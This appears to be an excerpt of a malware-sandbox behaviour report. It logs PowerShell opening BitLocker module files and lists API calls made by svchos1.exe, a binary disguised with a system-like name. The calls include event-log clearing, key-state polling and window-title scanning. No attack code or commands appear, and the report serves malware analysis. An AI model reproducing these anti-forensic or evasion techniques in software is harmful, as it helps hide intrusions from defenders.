Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	28_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007042BD GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,	28_2_007042BD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072E467 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	28_2_0072E467
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006EE507 SetForegroundWindow,IsIconic,	28_2_006EE507
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006EE5AB IsIconic,	28_2_006EE5AB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072E9F2 IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,	28_2_0072E9F2
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006D909A SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	28_2_006D909A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006E9135 IsWindowVisible,IsIconic,	28_2_006E9135
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072F5B7 IsIconic,PostMessageW,	28_2_0072F5B7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_0072D6D8 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	28_2_0072D6D8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_006B1D70 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	28_2_006B1D70
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035DD260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,	28_2_035DD260
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	29_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	29_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072E167 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,	29_2_0072E167
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007042BD GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,	29_2_007042BD
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072E467 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,	29_2_0072E467
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006EE507 SetForegroundWindow,IsIconic,	29_2_006EE507
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006EE5AB IsIconic,	29_2_006EE5AB
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072E9F2 IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,	29_2_0072E9F2
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006D909A SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,	29_2_006D909A
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006E9135 IsWindowVisible,IsIconic,	29_2_006E9135
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072F5B7 IsIconic,PostMessageW,	29_2_0072F5B7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0072D6D8 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,	29_2_0072D6D8
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_006B1D70 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	29_2_006B1D70
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_0309D260 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,	29_2_0309D260

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_035CE550 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,

28_2_035CE550

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_006C7777 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

28_2_006C7777

Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
